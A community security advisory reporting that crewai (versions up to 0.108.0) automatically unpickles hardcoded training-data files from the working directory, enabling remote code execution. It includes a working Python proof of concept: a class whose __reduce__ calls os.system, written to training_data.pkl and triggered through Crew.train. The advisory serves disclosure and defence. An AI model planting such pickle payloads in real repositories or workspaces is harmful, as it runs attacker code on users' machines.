Community Advisory: Remote Code Execution via Unsafe Pickle Deserialization in crewai #7248
Description
Advisory Details
- Package ecosystem: pip
- Package name: crewai
- Affected versions: <= 0.108.0
- Patched versions: (none)
- Severity: High
- CWE: CWE-502 (Deserialization of Untrusted Data)
Summary
PickleHandler.load() in crewai/utilities/file_handler.py:180 calls pickle.load() on hardcoded filenames (training_data.pkl, trained_agents_data.pkl) from CWD. These are loaded automatically during agent execution. An attacker who can place a malicious pickle file in the working directory (e.g., via a cloned repo or shared workspace) achieves instant RCE.
PoC
import pickle
import os
class Exploit:
def __reduce__(self):
return (os.system, ('id > /tmp/pwned',))
with open('training_data.pkl', 'wb') as f:
pickle.dump(Exploit(), f)
from crewai import Crew, Agent, Task
agent = Agent(role='test', goal='test', backstory='test')
task = Task(description='test', agent=agent, expected_output='test')
crew = Crew(agents=[agent], tasks=[task])
crew.train(n_iterations=1, filename='training_data.pkl')
# RCE triggered - check /tmp/pwnedImpact
Any user running CrewAI in a directory containing a malicious pickle file faces immediate remote code execution. This is exploitable via cloned repositories, shared workspaces, or any scenario where an attacker can write files to the working directory.